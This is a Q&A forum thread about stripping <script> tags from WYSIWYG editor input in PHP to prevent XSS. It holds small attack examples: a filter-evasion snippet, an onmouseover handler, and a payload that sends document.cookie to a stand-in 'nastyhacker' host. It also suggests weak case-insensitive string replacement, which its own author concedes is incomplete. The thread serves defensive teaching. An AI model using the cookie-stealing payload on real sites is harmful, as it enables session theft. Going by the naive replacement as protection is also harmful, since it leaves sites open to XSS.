5

How to change all the occurrence of the <script> <Script> <scRipT> <sCrIpT> and so .. to &lt;script&gt; &lt;Script&gt; with PHP
I also want to remove

The input will be taken from a WYSIWYG Editor, so i can not use the strip_tags function.

Edit 2
Is there any other way a user can execute a javascript with some kind of strange characters to
I found this on internet 

<scr<!--*-->ipt>
alert('hi')
</script>

But it did not worked though, is there any such possibilities ?

Improve this question

3 Answers 3

Reset to default
6

Simply removing <script> tags from untrusted input is not enough to guard against XSS attacks. For example, <a href="#" onmouseover="alert('pwned!');"> – I just put script in your page—without using a <script> tag—and stole your cookies. Oops.

This is a case where you really need to use a well-tested library that actually parses the HTML and removes the stuff you don't want.

Improve this answer
Sign up to request clarification or add additional context in comments.

4 Comments

i can convert < to &lt; but the problem is i'm using WYSIWYG editor, and they use <> too for html tags :(
BTW i've heard people stealing cookie using JAVASCRIPT, how is it possible :O, coz [i think] JS can not mail you my cookie, you are only able to steal your own cookie, if i 'm wrong please show me the error
@Sourav: Right, because <script> is a HTML tag just like <b> or any other. That is why you need a library like HTMLPurifier to parse your input and remove unsafe tags and attributes (like <script> blocks and event handler attributes like onmouseover, onclick, and onload).
@Sourav, re stealing cookies: If I could insert <script>document.write('<img src="//www.example.com/nastyhacker?cookie=' + encodeURIComponent(document.cookie) + '">');</script> into a page, I've successfully stolen the cookies of anyone who loads that page. (This is mitigated by the server setting a login cookie as HttpOnly, but that obviously depends on the site's configuration.)
3

Probably the simplest method would be str_ireplace() for case-insensitive replacement, however this won't preserve the case of the "sCriPt" word. But if you're out to de-fang XSS attacks that may be just fine:

str_ireplace("<script>", "&lt;script&gt;", $input);

A more complex solution could be devised with preg_replace() to preserve case, but would be slower. This might work, but if it were me I'd use str_ireplace()...

preg_replace("/<(script)>/i", "&lt;$1&gt;", $input);

Note: If it is XSS prevention you're after, neither of these takes into account things like <script type=text/javascript>. To truly handle these cases, you need to load the HTML string into DOMDocument and delete the offending script nodes.

Improve this answer

3 Comments

Do not use a regex to parse HTML.
@josh3736 I agree, and as in my answer I wouldn't use preg_replace, but in this instance it isn't even being used as a regex. Instead it's just a shortcut to preserve case in a simple string replacement. Anyway, disclaimer added above.
you need to load the HTML string into DOMDocument and delete the offending script nodes how to do that !
0

Is there any reason you can't use htmlspecialchars()?

Improve this answer

4 Comments

I just want to convert <,>,'," to save DB space
@Sourav How will that conserve space?
When i use htmlspecialchars() it will convert & to &amp; so it stores 5 characters instead of a single !
But if you convert < to &lt; it will be storing four characters instead of one..Either way, I highly recommend the answers above regarding XSS.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.